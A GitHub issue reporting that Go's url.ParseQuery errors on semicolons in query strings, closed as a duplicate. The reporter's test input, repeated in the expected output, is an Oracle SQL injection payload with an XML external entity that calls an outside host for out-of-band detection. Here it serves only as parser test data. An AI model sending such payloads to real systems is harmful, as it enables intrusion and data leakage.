Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Issues parsing urls containing semicolons #49683

Closed
jptosso opened this issue Nov 19, 2021 · 1 comment
Closed

Issues parsing urls containing semicolons #49683

jptosso opened this issue Nov 19, 2021 · 1 comment
Labels
FrozenDueToAge

Comments

@jptosso
Copy link

jptosso commented Nov 19, 2021
edited

What version of Go are you using (go version)?

$ go version
go version go1.17.2 darwin/amd64

Does this issue reproduce with the latest release?

Haven't tried

What operating system and processor architecture are you using (go env)?

go env Output
$ go env
GO111MODULE=""
GOARCH="amd64"
GOBIN=""
GOCACHE="/Users/jptosso/Library/Caches/go-build"
GOENV="/Users/jptosso/Library/Application Support/go/env"
GOEXE=""
GOEXPERIMENT=""
GOFLAGS=""
GOHOSTARCH="amd64"
GOHOSTOS="darwin"
GOINSECURE=""
GOMODCACHE="/Users/jptosso/go/pkg/mod"
GONOPROXY=""
GONOSUMDB=""
GOOS="darwin"
GOPATH="/Users/jptosso/go"
GOPRIVATE=""
GOPROXY="https://proxy.golang.org,direct"
GOROOT="/usr/local/Cellar/go/1.17.2/libexec"
GOSUMDB="sum.golang.org"
GOTMPDIR=""
GOTOOLDIR="/usr/local/Cellar/go/1.17.2/libexec/pkg/tool/darwin_amd64"
GOVCS=""
GOVERSION="go1.17.2"
GCCGO="gccgo"
AR="ar"
CC="clang"
CXX="clang++"
CGO_ENABLED="1"
GOMOD="/dev/null"
CGO_CFLAGS="-g -O2"
CGO_CPPFLAGS=""
CGO_CXXFLAGS="-g -O2"
CGO_FFLAGS="-g -O2"
CGO_LDFLAGS="-g -O2"
PKG_CONFIG="pkg-config"
GOGCCFLAGS="-fPIC -arch x86_64 -m64 -pthread -fno-caret-diagnostics -Qunused-arguments -fmessage-length=0 -fdebug-prefix-map=/var/folders/_r/p6w6znr53cl59s7gnnszz4sm0000gn/T/go-build3105120933=/tmp/go-build -gno-record-gcc-switches -fno-common"

What did you do?

func TestUrlPayloads2(t *testing.T) {
	out := `var=EmptyValue'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM "http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/">%awpsd;`
	c, err := url.ParseQuery(out)
	if err != nil {
		t.Error("failed to parse query", err)
	}
	if p, ok := c["var"]; !ok {
		t.Error("Expected var to be in the map, got ", c)
	} else if len(p) != 1 || p[0] != out {
		t.Error("failed to set var")
	}
}

Output: invalid semicolon separator in query

What did you expect to see?

I have tried it with many web application frameworks and languages (php, ror, nodejs) and it works as expected:

Array
(
    [var] => EmptyValue'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM "http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/">%awpsd;
)

I know golang supports & and ; as separators but I think it should be changed just to & and ignore ;.

What did you see instead?

I get an empty map[string][]string and an error
@seankhliao
Copy link
Member

Duplicate of #47425

@seankhliao seankhliao marked this as a duplicate of #47425 Nov 19, 2021
@chrisguiney chrisguiney mentioned this issue Dec 7, 2021
Open
@chrisguiney chrisguiney mentioned this issue Oct 18, 2022
Open
@golang golang locked and limited conversation to collaborators Nov 19, 2022
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
FrozenDueToAge
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@jptosso @gopherbot @seankhliao